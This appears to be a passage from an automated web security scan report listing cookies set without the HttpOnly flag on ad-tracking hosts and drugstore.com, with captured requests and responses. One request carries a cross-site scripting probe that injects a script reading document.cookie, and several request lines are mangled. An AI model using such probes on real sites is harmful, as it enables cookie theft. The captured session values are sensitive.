http://s.amazon-cornerstone.com
Path:
/iui3
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:ad-id=Ayy0HVI91kopvWsXdVMP4Ng; Domain=amazon-cornerstone.com; Expires=Thu, 01-Jan-2037 00:00:01 GMT; Path=/
Request
GET /iui3?d=assoc-amazon.com&enId=Associates&eId=view&r=1&rP=http%3A%2F%2Fportal.opera.com%2F&cB=2790792565792799 HTTP/1.1;q=0.3sXdVMP4Ng
Response
HTTP/1.1 200 OK.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "Set-Cookie: ad-id=Ayy0HVI91kopvWsXdVMP4Ng; Domain=amazon-cornerstone.com; Expires=Thu, 01-Jan-2037 00:00:01 GMT; Path=/ -Agent..,...........D..;
11.44. http://t.tellapart.com/hif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://t.tellapart.com
Path:
/hif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:tap=u55Faqj9eQjR2O84CPogQjfO0UMPAAEMAAAABAsAAQAAAAI5OQoAAwAAATJzE1qmAAsAAQAAAAI3NQoAAwAAATJzE1qmAAsAAQAAAAI3NAoAAwAAATJzE1qmAAsAAQAAAAMxMDUKAAMAAAEycxNapgAA; expires=Wed, 14-Mar-2012 16:30:40 GMT; Path=/; Domain=.tellapart.com
Request
GET /hif?p=vobmfNYCXJkpXrtb_UNRwyPDtCMLAAEAAAAQ8VfMRuCtWlGZKHGOFgAdYAsAAgAAABDBNWrL_D1gZ_QvSD7Ubh68CgADAAABMnMTUeAPAAQLAAAABAAAAAI5OQAAAAI3NQAAAAI3NAAAAAMxMDULAAUAAAAMZ01JVlhQT2pId09LAA==&tms=1316208686167 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7O1GhjWGagkBZ8cNX0k4oxPsv8LF9nJWKu12mbgkeBMt_o6CvAURFeGEBSF8UxpLeFjWV5Q2eOlAeV7yVQxxfhVQ6n7tXCCk-3AaAr-3DeDS9cBGOjMik-CONnHvyl4pD3SI4onQ1Vx5D2OKkZQcrsaYTa28GPXtJ-72-twAilquinwVbDX2VnkhBOx2C9B; __cmbGU=ABJeb1_3NV-wS9CA4xNFiv3ShLSU4iGgty4u6k9WHsPFv60ohMiFdyhiaxwr6ZVfLN137aUZJTCXZJufx_taXD_Nnqj8E6TcGg; AWSELB=E31F5987121C4E93C56CFAE300CB3FAA8458B8275ED54EFB1FBFC3259C68A4A477202DDBEDB9857088204A944F7B0E0B304C51662855C88DA4DD00256DCA9F810994CC9BEC
Response
HTTP/1.1 200 OKSet-Cookie: tap=u55Faqj9eQjR2O84CPogQjfO0UMPAAEMAAAABAsAAQAAAAI5OQoAAwAAATJzE1qmAAsAAQAAAAI3NQoAAwAAATJzE1qmAAsAAQAAAAI3NAoAAwAAATJzE1qmAAsAAQAAAAMxMDUKAAMAAAEycxNapgAA; expires=Wed, 14-Mar-2012 16:30:40 GMT; Path=/; Domain=.tellapart.com ...[SNIP]...
11.45. http://t.tellapart.com/tpv
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://t.tellapart.com
Path:
/tpv
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:drapt=ABJeb1-OGLj4WPvpme0zBTQDHBR2ngUamtMs7GbygO59z7fXQOniCJ8DjeWZ8L9eYgAVK6hYK3p1tBNfX8Xmcx3xwQX_qgZHgGWzmqbFyg087KXDAfGZRSaIgDTBgVyOONjrkaJcuqQa2DYxgK6XBTR7LuHVTeCMVLKe36NAUdE36Dcb_E2NYoghvsg5T0ETAeX2LzcZMKlmy8WGiBSObQtOkAFDoGA3Tw; expires=Wed, 14-Mar-2012 16:32:47 GMT; Path=/; Domain=.tellapart.com tap=f5bZJDN6To6TOJUrsLRvCLAoTUsPAAEMAAAABAsAAQAAAAI5OQoAAwAAATJzE1YSAAsAAQAAAAI3NQoAAwAAATJzE1YSAAsAAQAAAAI3NAoAAwAAATJzE1YSAAsAAQAAAAMxMDUKAAMAAAEycxNWEgAA; expires=Wed, 14-Mar-2012 16:32:47 GMT; Path=/; Domain=.tellapart.com
Request
GET /tpv?aid=gMIVXPOjHwOK&xt=pv&xa=%7B%22PageType%22%3A%22Other%22%7D&ui=AE3CDAF6684448E8B02A74CB8F113324&r=1597292207&dmk=home&dmd=Shop%20for%20prescription%20drugs%2C%20health%20%26%20beauty%2C%20green%20%26%20natural%2C%20pet%20products%2C%20food%20%26%20gourmet%2C%20toys%20%26%20games%20and%20more%20at%20drugstore.com.&c=__cmbDomTm%3D0%3B__cmbU%3DABJeb1_3NV-wS9CA4xNFiv3ShLSU4iGgty4u6k9WHsPFv60ohMiFdyhiaxwr6ZVfLN137aUZJTCXZJufx_taXD_Nnqj8E6TcGg%3B__cmbTpvTm%3D1058&dt=drugstore.com%20Online%20Pharmacy%20-%20Prescription%20Drugs%2C%20Health%20and%20Beauty%2C%20plus%20more&dr=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&du=http%3A%2F%2Fwww.drugstore.com%2F%3Fec1bb%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E204f91ee9a2%3D1&v=4&sr=1920x1200&sc=16&bl=en-US HTTP/1.1;q=0.7?ec1bb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E204f91ee9a2=1O1GhjWGagkBZ8cNX0k4oxPsv8LF9nJWKu12mbgkeBMt_o6CvAURFeGEBSF8UxpLeFjWV5Q2eOlAeV7yVQxxfhVQ6n7tXCCk-3AaAr-3DeDS9cBGOjMik-CONnHvyl4pD3SI4onQ1Vx5D2OKkZQcrsaYTa28GPXtJ-72-twAilquinwVbDX2VnkhBOx2C9B; __cmbGU=ABJeb1_3NV-wS9CA4xNFiv3ShLSU4iGgty4u6k9WHsPFv60ohMiFdyhiaxwr6ZVfLN137aUZJTCXZJufx_taXD_Nnqj8E6TcGg; AWSELB=E31F5987121C4E93C56CFAE300CB3FAA8458B8275ED54EFB1FBFC3259C68A4A477202DDBEDB9857088204A944F7B0E0B304C51662855C88DA4DD00256DCA9F810994CC9BEC; tap=f5bZJDN6To6TOJUrsLRvCLAoTUsPAAEMAAAABAsAAQAAAAI5OQoAAwAAATJzE1YSAAsAAQAAAAI3NQoAAwAAATJzE1YSAAsAAQAAAAI3NAoAAwAAATJzE1YSAAsAAQAAAAMxMDUKAAMAAAEycxNWEgAA; __cmbPI=vobmfNYCXJkpXrtb_UNRwyPDtCMLAAEAAAAQ8VfMRuCtWlGZKHGOFgAdYAsAAgAAABDBNWrL_D1gZ_QvSD7Ubh68CgADAAABMnMTUeAPAAQLAAAABAAAAAI5OQAAAAI3NQAAAAI3NAAAAAMxMDULAAUAAAAMZ01JVlhQT2pId09LAA==; __cmbPD=99/74/75/105; __cmbTmf=2320
Response
HTTP/1.1 200 OKSet-Cookie: drapt=ABJeb1-OGLj4WPvpme0zBTQDHBR2ngUamtMs7GbygO59z7fXQOniCJ8DjeWZ8L9eYgAVK6hYK3p1tBNfX8Xmcx3xwQX_qgZHgGWzmqbFyg087KXDAfGZRSaIgDTBgVyOONjrkaJcuqQa2DYxgK6XBTR7LuHVTeCMVLKe36NAUdE36Dcb_E2NYoghvsg5T0ETAeX2LzcZMKlmy8WGiBSObQtOkAFDoGA3Tw; expires=Wed, 14-Mar-2012 16:32:47 GMT; Path=/; Domain=.tellapart.com Set-Cookie: tap=f5bZJDN6To6TOJUrsLRvCLAoTUsPAAEMAAAABAsAAQAAAAI5OQoAAwAAATJzE1YSAAsAAQAAAAI3NQoAAwAAATJzE1YSAAsAAQAAAAI3NAoAAwAAATJzE1YSAAsAAQAAAAMxMDUKAAMAAAEycxNWEgAA; expires=Wed, 14-Mar-2012 16:32:47 GMT; Path=/; Domain=.tellapart.com _requestCallback({});
11.46. http://t5.trackalyzer.com/trackalyze.asp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://t5.trackalyzer.com
Path:
/trackalyze.asp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:loop=http%3A%2F%2Fwww%2Eblackbaud%2Ecom%2F; expires=Sat, 17-Sep-2011 07:00:00 GMT; path=/
Request
GET /trackalyze.asp?r=None&p=http%3A//www.blackbaud.com/&i=15983 HTTP/1.1;q=0.38618558
Response
HTTP/1.1 302 Object moved/trackalyzer.com/w3c/p3p.xml", CP="NON DSP COR CURa OUR NOR"/dot.gifSet-Cookie: loop=http%3A%2F%2Fwww%2Eblackbaud%2Ecom%2F; expires=Sat, 17-Sep-2011 07:00:00 GMT; path=/ .trackalyzer.com/dot.gif">here</a>.</body>
11.47. http://tags.bluekai.com/site/2731
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tags.bluekai.com
Path:
/site/2731
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:bklc=4e7379ae; expires=Sun, 18-Sep-2011 16:30:38 GMT; path=/; domain=.bluekai.com bk=eE0PtpKoj45Mq/0A; expires=Wed, 14-Mar-2012 16:30:38 GMT; path=/; domain=.bluekai.com bkc=KJh5NWN/PaWDOdedKd1C1IwAOhVosVVZYHVVO/Uibv/w9N2asJvZY8kJ/k5YWHHJJSn69xV80vV6YjxxMu9uePGZrYiZL9yZulJHiX3WgcwKpclKzh5FCCIzzII8cIKsyLescZeAzg5M9xiHMI8qz0/wZYI6TEdj85QjFpzXRdijTjyXbDIqo/40oPF2XJyE9HjI9EIzngzK2gW3SR8UpQGOWtN9yb1nMQXpB7FDXBjvbVneB4lu7HKkph7KPux5v8eZI7EfLmjGBgYSSIcb8Abl4FqFGeE7vbIL9XTZn5pS7dezqniJpk9l80rU6P5faHMx4eGLlVuRX8De5ebERH+dsrvKaNvVzaV8Bmzg4XQa5GjLlvt/rI4ng31pN1lh0QwAfiDnQbL5ECYFUJXl7wyZ4E2QYh4Tow6osU2ACpEwglrmh+d2gTwmbbUgp8784nez47AbZ/8UdEBNxdoyMpEdv6dEptQC6nCT7BRfFoz2RoMgDU81IVBMyvWgnKuVOnrbP8gMkVdulifEKi5vs2l8taI0oOlb5cmIXZ+4rC2rAIt1nfPJFp6QwVrTFPvSI6Dl2T+r7kXl2TF05ffqPcX0mN64tdzEyizi6M0KXgD9fDzpNS08lud53gAdCIfELGDlZFL1ONwuJRSlsKqhkEduTG/cQEwQ2SNlfE41XzG55wIZPiy1/jlwlob911zga2wfWut01w0yyUwW11zgqT7uK6n2Xv/tHFzfrRs2H/I9qG8Uf3U8X3ZdEMto5dwjAfEdrMkKIEZ5ClXSsYIFX2hU/Llh0+wAq/3FMLDXN6SAmP88AKRqoFKkJafMKR2CMk4IuIr4UfUy+VpBzlKAYXrkj6rkbbAd5wwT0QX08l4FURPehcdNKsP9; expires=Wed, 14-Mar-2012 16:30:38 GMT; path=/; domain=.bluekai.com bkou=KJhMRsOQRsq/pupQjE9N6e10NM1WRxmp5jUa4A9oOCSsp93LAQ9ge9F6; expires=Wed, 14-Mar-2012 16:30:38 GMT; path=/; domain=.bluekai.com
Request
GET /site/2731 HTTP/1.1/*;q=0.5;q=0.7KdBZhOZ7Duk/puQpJbcYAvOxcaNDEmYgYWwv5YWpuKx33WNHPYJvcNYxiNhvZ09J6xQi6SOkQG+iYLF9n1kanuGEZMg7p5p7wU4hjFMOd2pFK21kyc08eK5RgtLeuJw4s8Thd1hygWEb66qoTPnoeQKIRhaQXH4yyINNgqywN6+pUgZQWJMGOJ/wpfAOpBMLDzBqb3xgeEzmuw5zAe8MKsKa5vJ1ZLK7mT9NHTr9qnsaS8+bFwsp4TKArP885HNymZwC8+b6flqeqVW/zfN0eUNBkTaOpu4Y6ZtsrPT8uwLpsqqhJ870FqCQY54coqkKID1hLvwxholSknKdfsqSx2tzPhTA7NIt1JE+5ABT84ZLTzylbU+OVfQL/m6L0w0Cf5nzFIT8S7dUFtfSg8KKwI4fYXOY/SlP6baz7r4c7gGr44Y3BwXgE2wwSe7xr7uW8MrICdlR1/2cIHcPMT6OO0b5XrgjeUlu7aKIxVrfxFm53sfNdSP9t3PwB2zgFyfAfL1+LollhDfo+drAjyNlND7p45cB26Dl2bIqfTF05pfqBw81DV8Xf1OwYOIBucBf0kKY+Of+BsqBUR86CISOsJt7ax+FBwzqeiN/Ph7KSoMqPd8/AyF+O6bY8f4KLtmRXXg55wbZPi61/N4wloSs1mKPvI72iajRscZx2O6hpc7kpPabEIQIFsCv6w7mqs9F60mQZdwv45H4v5tFT62SFcgtJvtdqLTgwb42zvSOXUipfdT3SzTgE8mnvBIxuwCriACpU7ZJICrC2bD3NKCf+tcmvdIkIz27nU0+V4wzqK70rwHL+Uxnlxd5lnf0d4pIlUNUbhnhc8VkU4/=; bko=KJ0fnzg9Rnx0hTIHxRbwQKsMUbT4W61EOT0NAjmOyU1jucSc1/EaheYJeunnhEYHs0nspw9V3wK7j0ox7EWdMcD1ScvdJGCN9tiKS666AcVSiTsCPXDUjOLdMcVVsXqbJxJC1EczTRVJJxJjNlC9RgJ9mNbGtxO+ATu0sOA9pMT359==; bkp1=; bku=kQ199JnSvDfyUEoR; bkw5=KJ0PPWNgD6WDwS2M4JZ7S5BShWdLxoFsFJ/GUPEXSOGCY0tRk+qZPVAgdx6iQ39NYlc7ECKbzKaYWeKibWJxxxxCieIQSL6Erl1C5oUiFVIZpGxAoqfapee74ohp828lbHY9KO64SW+M1x1TzvVdaNi/AnD/0SYiA468TBW9UKtoR0Qm2s9o0TM6U+yaNQTpWr/pqHfZiyjj0iMWGb6q2TXRomReCUu/4WnxljIMQWOP1/m3Z1FhKZDVznwswTUH/K1dueRasKvEYlEitcCg4tPP+b0tSeVrf/FVo8haw3KN58CLXxrpeg9e3Km+/bScrVHCjBVn0tzDGI/BT1kJxiiUEXCOnJX0BUNn8bnVsLmpWDS3RZxl6147IYgTzp94XOggdkapzYrFbkBbhlzdX6j8/fnuaZs4smDHQ1fVgvR8NrRXbkSm2CP++alj6wj273r7Iibnhvi3ckFkY+hV/4GfQYxK7MPbAlEs+FDKWOq0MHawHHFWvyF8m3Rbioam4Oyp0nNp3k4Td4GhP0JZIFNLpQl5S4adGn68gGIaW7Kw2OyVaUVc2B8DQmkh73Txj5nuCK0W0U82Dicz/yJU92DM7srHAWJzPqWnNTndTlDpXQfhtIWJdeTaqBVXN9FqfvgihsNGwCUngyKN35qEDBczMaUfal8Xlii1RU7Svnpe8IlgDdYkqvSQVaqhA0kZFILiABeLUuZikEPLFC3tVkK0t+5k60AIULbRapAxzmfPuaLum0IxlfdvqExCpHV5eBE4kiw+ytZvNvcjv3rdHsf67y==; bkou=KJhMRsOQRsq/pupQjE9N6e10NM1WRx1pptD84A9oOCSsp9G10R2IrUT9/66nhy==; bkst=KJhBDn+vha9Dw1VYTvfrQoqSqKZal1K8ebNYrWPyWN5AWKp1iyPBRrWi+ZvfUbYkV+Cg8EK/kKJ4bO2TW8+1BzhyjoMEQf5PQOPRPs5P4PVaEI5hepbb6rzQz+vwApS9v03akYiGkkGMHpE4gElLQXBFUeoIbdQRH1bBW1GMwvKvSsDv/Mmkiv9mZ/AWEfwUzUwftmI6nP+oq5Y61zR2uuPeHsADHSlDp5qzt5FmlQHY6PeBw/b1Y3b6jfHTr9r5dfpKuUhoW2Ic9eLxIwq/fA2mJADTi6+iMb4UkloKa7PA5T+o4c9RnmGnsdZI7xP4fqY2Du434NXbS+38EsViKDRj3LH2C4/XFRzGdQ1J2Psc; __utma=252226138.2034852110.1313672419.1313672419.1313681721.2; __utmz=252226138.1313681721.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName
Response
HTTP/1.1 200 OKSet-Cookie: bklc=4e7379ae; expires=Sun, 18-Sep-2011 16:30:38 GMT; path=/; domain=.bluekai.com Set-Cookie: bk=eE0PtpKoj45Mq/0A; expires=Wed, 14-Mar-2012 16:30:38 GMT; path=/; domain=.bluekai.com Set-Cookie: bkc=KJh5NWN/PaWDOdedKd1C1IwAOhVosVVZYHVVO/Uibv/w9N2asJvZY8kJ/k5YWHHJJSn69xV80vV6YjxxMu9uePGZrYiZL9yZulJHiX3WgcwKpclKzh5FCCIzzII8cIKsyLescZeAzg5M9xiHMI8qz0/wZYI6TEdj85QjFpzXRdijTjyXbDIqo/40oPF2XJyE9HjI9EIzngzK2gW3SR8UpQGOWtN9yb1nMQXpB7FDXBjvbVneB4lu7HKkph7KPux5v8eZI7EfLmjGBgYSSIcb8Abl4FqFGeE7vbIL9XTZn5pS7dezqniJpk9l80rU6P5faHMx4eGLlVuRX8De5ebERH+dsrvKaNvVzaV8Bmzg4XQa5GjLlvt/rI4ng31pN1lh0QwAfiDnQbL5ECYFUJXl7wyZ4E2QYh4Tow6osU2ACpEwglrmh+d2gTwmbbUgp8784nez47AbZ/8UdEBNxdoyMpEdv6dEptQC6nCT7BRfFoz2RoMgDU81IVBMyvWgnKuVOnrbP8gMkVdulifEKi5vs2l8taI0oOlb5cmIXZ+4rC2rAIt1nfPJFp6QwVrTFPvSI6Dl2T+r7kXl2TF05ffqPcX0mN64tdzEyizi6M0KXgD9fDzpNS08lud53gAdCIfELGDlZFL1ONwuJRSlsKqhkEduTG/cQEwQ2SNlfE41XzG55wIZPiy1/jlwlob911zga2wfWut01w0yyUwW11zgqT7uK6n2Xv/tHFzfrRs2H/I9qG8Uf3U8X3ZdEMto5dwjAfEdrMkKIEZ5ClXSsYIFX2hU/Llh0+wAq/3FMLDXN6SAmP88AKRqoFKkJafMKR2CMk4IuIr4UfUy+VpBzlKAYXrkj6rkbbAd5wwT0QX08l4FURPehcdNKsP9; expires=Wed, 14-Mar-2012 16:30:38 GMT; path=/; domain=.bluekai.com Set-Cookie: bkou=KJhMRsOQRsq/pupQjE9N6e10NM1WRxmp5jUa4A9oOCSsp93LAQ9ge9F6; expires=Wed, 14-Mar-2012 16:30:38 GMT; path=/; domain=.bluekai.com .bluekai.com/w3c/p3p.xml".NETSCAPE2.0.....!.. ....,...........L..;
11.48. http://thefavicongallery.com/h/u/hugi.is.ico
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://thefavicongallery.com
Path:
/h/u/hugi.is.ico
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:720plan=R1791018349; path=/; expires=Mon, 19-Sep-2011 06:15:46 GMT
Request
GET /h/u/hugi.is.ico HTTP/1.1;q=0.3
Response
HTTP/1.1 200 OKSet-Cookie: 720plan=R1791018349; path=/; expires=Mon, 19-Sep-2011 06:15:46 GMT "..... ...................................................................................f..f..f..f..f..f..f..f..f..f..f..f..f..f........f..f..f..f..f..f..f..f..f..f..f..f..f....[SNIP]...
11.49. http://tracking.waterfrontmedia.com/GCScript.ashx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tracking.waterfrontmedia.com
Path:
/GCScript.ashx
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:GWFM=U=2ee636e8-ffbb-4707-83f7-1e5c10da5819&G=2ee636e8-ffbb-4707-83f7-1e5c10da5819&UTP=u%3d2ee636e8-ffbb-4707-83f7-1e5c10da5819%3b; expires=Wed, 16-Sep-2111 16:30:26 GMT; path=/
Request
GET /GCScript.ashx HTTP/1.1.com;q=0.7
Response
HTTP/1.1 200 OKSet-Cookie: GWFM=U=2ee636e8-ffbb-4707-83f7-1e5c10da5819&G=2ee636e8-ffbb-4707-83f7-1e5c10da5819&UTP=u%3d2ee636e8-ffbb-4707-83f7-1e5c10da5819%3b; expires=Wed, 16-Sep-2111 16:30:26 GMT; path=/ -83f7-1e5c10da5819;'; function addTrackingEvent(delegate) { if(document.addEventListener) { document.addEventListener('DOMContentLoaded', delegate, false); } else if(windo...[SNIP]...
11.50. http://united-business-media-plc.production.investis.com/en/stylesheets/~/media/Images/U/United-Business-Media-Plc/Images/css/footer-link-sep.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://united-business-media-plc.production.investis.com
Path:
/en/stylesheets/~/media/Images/U/United-Business-Media-Plc/Images/css/footer-link-sep.jpg
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:SERVERID=GS2-WEB01; path=/
Request
GET /en/stylesheets/~/media/Images/U/United-Business-Media-Plc/Images/css/footer-link-sep.jpg HTTP/1.1.production.investis.com;q=0.3
Response
HTTP/1.1 200 OK=mtw4xpyiiuuzjb3kbvrxb5v2; path=/; HttpOnlySet-Cookie: SERVERID=GS2-WEB01; path=/ .Ducky.......P.....&Adobe.d.................................. ..............[SNIP]...
11.51. http://www.blackbaud.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.blackbaud.com
Path:
/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:ti=userid=&UserHandle=&UserPassword=&SupportSiteID=; expires=Mon, 16-Mar-2009 15:29:09 GMT; path=/ ti=userid=&UserHandle=&UserPassword=&SupportSiteID=; expires=Mon, 16-Mar-2009 15:29:09 GMT; path=/
Request
GET / HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OKSet-Cookie: ti=userid=&UserHandle=&UserPassword=&SupportSiteID=; expires=Mon, 16-Mar-2009 15:29:09 GMT; path=/ Set-Cookie: ti=userid=&UserHandle=&UserPassword=&SupportSiteID=; expires=Mon, 16-Mar-2009 15:29:09 GMT; path=/ ...[SNIP]...
11.52. http://www.drugstore.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.drugstore.com
Path:
/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:STICKY=SEAWEB038P:7B1B08A6C5BF4A968C79C9BFB007FDD0:ndla3vftgeechv555qu43rz2; domain=.drugstore.com; expires=Thu, 15-Jan-2037 08:00:00 GMT; path=/ BIGipServerdscm_farm=2316609728.0.0000; expires=Fri, 16-Sep-2011 17:30:25 GMT; path=/
Request
GET / HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7:7B1B08A6C5BF4A968C79C9BFB007FDD0:e5fygw55j4x2lwjzim2cqdi4
Response
HTTP/1.1 200 OKSet-Cookie: STICKY=SEAWEB038P:7B1B08A6C5BF4A968C79C9BFB007FDD0:ndla3vftgeechv555qu43rz2; domain=.drugstore.com; expires=Thu, 15-Jan-2037 08:00:00 GMT; path=/ Set-Cookie: BIGipServerdscm_farm=2316609728.0.0000; expires=Fri, 16-Sep-2011 17:30:25 GMT; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">...[SNIP]...
11.53. http://www.drugstore.com/LookAheadSuggestions.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.drugstore.com
Path:
/LookAheadSuggestions.aspx
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerdscm_farm=2316609728.0.0000; expires=Fri, 16-Sep-2011 17:31:35 GMT; path=/
Request
POST /LookAheadSuggestions.aspx HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7-urlencoded; charset=UTF-8:7B1B08A6C5BF4A968C79C9BFB007FDD0:jy0lemycstoxx3j2aggf0d55; ASP.NET_SessionId=tujq4xeiqb4bta55tp0jzqna; drugstore%2Efish=UserID=57ABB42C1945443F8A38894F54FEB227; ABTests=07082011_tns_abtest=abtest_not_qualified@&20051228_entrypages=1@09/16/2011 9:30:24 AM&091211_GWP_YTC=1@09/16/2011 9:30:24 AM&040610_bizrate_beauty=1@09/16/2011 9:30:24 AM&030411_click2chat_dscm=1@09/16/2011 9:30:24 AM&110210_bizrate_VD=abtest_not_qualified@&20090319_ForeSee_Vision=abtest_not_qualified@&pdetails_ver2=1@09/16/2011 9:30:24 AM&20060410_bizrate=0@09/16/2011 9:30:24 AM&20070530_GoogleCheckout=1@09/16/2011 9:30:24 AM&aggregate_knowledge=1@09/16/2011 9:30:24 AM&ship_interrupt=2@09/16/2011 9:30:24 AM&05262011_ivd_ciba_25percent_off=abtest_not_qualified@; BIGipServerdscm_farm=2316609728.0.0000; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20abtest%3DABTEST_20060410_bizrate%257C0%3B; s_vi=[CS]v1|2739BCD58514B3D4-4000018C2004D12D[CE]; _br_uid_1=uid%3D5299788113416%3A; __cmbDomTm=0; __cmbU=ABJeb1_3NV-wS9CA4xNFiv3ShLSU4iGgty4u6k9WHsPFv60ohMiFdyhiaxwr6ZVfLN137aUZJTCXZJufx_taXD_Nnqj8E6TcGg; __cmbTpvTm=1058&osid=-1&st=1&ost=8&on=Beauty.com&enePort=8000&eneHost=search.dsprod.drugstore.com&max=10&cid=0&ntk=All&hts=True&_=
Response
HTTP/1.1 200 OKSet-Cookie: BIGipServerdscm_farm=2316609728.0.0000; expires=Fri, 16-Sep-2011 17:31:35 GMT; path=/
11.54. http://www.drugstore.com/pharmacy/drugindex/rxsearch.asp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.drugstore.com
Path:
/pharmacy/drugindex/rxsearch.asp
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:STICKY=SEAWEB038P:7B1B08A6C5BF4A968C79C9BFB007FDD0:yonvhm55shpcsh45w02oevnl; domain=.drugstore.com; expires=Thu, 15-Jan-2037 08:00:00 GMT; path=/ BIGipServerdscm_farm=2316609728.0.0000; expires=Fri, 16-Sep-2011 17:31:39 GMT; path=/
Request
GET /pharmacy/drugindex/rxsearch.asp?search=ess HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7:7B1B08A6C5BF4A968C79C9BFB007FDD0:ssmstg55acliez55gebilj55; ASP.NET_SessionId=tujq4xeiqb4bta55tp0jzqna; drugstore%2Efish=UserID=57ABB42C1945443F8A38894F54FEB227; ABTests=07082011_tns_abtest=abtest_not_qualified@&20051228_entrypages=1@09/16/2011 9:30:24 AM&091211_GWP_YTC=1@09/16/2011 9:30:24 AM&040610_bizrate_beauty=1@09/16/2011 9:30:24 AM&030411_click2chat_dscm=1@09/16/2011 9:30:24 AM&110210_bizrate_VD=abtest_not_qualified@&20090319_ForeSee_Vision=abtest_not_qualified@&pdetails_ver2=1@09/16/2011 9:30:24 AM&20060410_bizrate=0@09/16/2011 9:30:24 AM&20070530_GoogleCheckout=1@09/16/2011 9:30:24 AM&aggregate_knowledge=1@09/16/2011 9:30:24 AM&ship_interrupt=2@09/16/2011 9:30:24 AM&05262011_ivd_ciba_25percent_off=abtest_not_qualified@; BIGipServerdscm_farm=2316609728.0.0000; s_sess=%20s_cc%3Dtrue%3B%20abtest%3DABTEST_20060410_bizrate%257C0%3B%20s_sq%3Ddrugstorecomglobalprod%253D%252526pid%25253Dotc%2525253Ahomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/sites/0/icon_search.gif%252526ot%25253DIMAGE%3B; s_vi=[CS]v1|2739BCD58514B3D4-4000018C2004D12D[CE]; _br_uid_1=uid%3D5299788113416%3A; __cmbDomTm=0; __cmbU=ABJeb1_3NV-wS9CA4xNFiv3ShLSU4iGgty4u6k9WHsPFv60ohMiFdyhiaxwr6ZVfLN137aUZJTCXZJufx_taXD_Nnqj8E6TcGg; __cmbTpvTm=1058
Response
HTTP/1.1 200 OKSet-Cookie: STICKY=SEAWEB038P:7B1B08A6C5BF4A968C79C9BFB007FDD0:yonvhm55shpcsh45w02oevnl; domain=.drugstore.com; expires=Thu, 15-Jan-2037 08:00:00 GMT; path=/ Set-Cookie: BIGipServerdscm_farm=2316609728.0.0000; expires=Fri, 16-Sep-2011 17:31:39 GMT; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">...[SNIP]...
11.55. http://www.drugstore.com/search/search_results.asp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.drugstore.com
Path:
/search/search_results.asp
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:STICKY=SEAWEB038P:7B1B08A6C5BF4A968C79C9BFB007FDD0:moymzk55ygfcmm45khc4ln45; domain=.drugstore.com; expires=Thu, 15-Jan-2037 08:00:00 GMT; path=/ BIGipServerdscm_farm=2316609728.0.0000; expires=Fri, 16-Sep-2011 17:31:37 GMT; path=/
Request
GET /search/search_results.asp?N=0&Ntx=mode%2Bmatchallpartial&Ntk=All&srchtree=1&Ntt=xss%5C&Go.x=0&Go.y=0 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7:7B1B08A6C5BF4A968C79C9BFB007FDD0:jy0lemycstoxx3j2aggf0d55; ASP.NET_SessionId=tujq4xeiqb4bta55tp0jzqna; drugstore%2Efish=UserID=57ABB42C1945443F8A38894F54FEB227; ABTests=07082011_tns_abtest=abtest_not_qualified@&20051228_entrypages=1@09/16/2011 9:30:24 AM&091211_GWP_YTC=1@09/16/2011 9:30:24 AM&040610_bizrate_beauty=1@09/16/2011 9:30:24 AM&030411_click2chat_dscm=1@09/16/2011 9:30:24 AM&110210_bizrate_VD=abtest_not_qualified@&20090319_ForeSee_Vision=abtest_not_qualified@&pdetails_ver2=1@09/16/2011 9:30:24 AM&20060410_bizrate=0@09/16/2011 9:30:24 AM&20070530_GoogleCheckout=1@09/16/2011 9:30:24 AM&aggregate_knowledge=1@09/16/2011 9:30:24 AM&ship_interrupt=2@09/16/2011 9:30:24 AM&05262011_ivd_ciba_25percent_off=abtest_not_qualified@; BIGipServerdscm_farm=2316609728.0.0000; 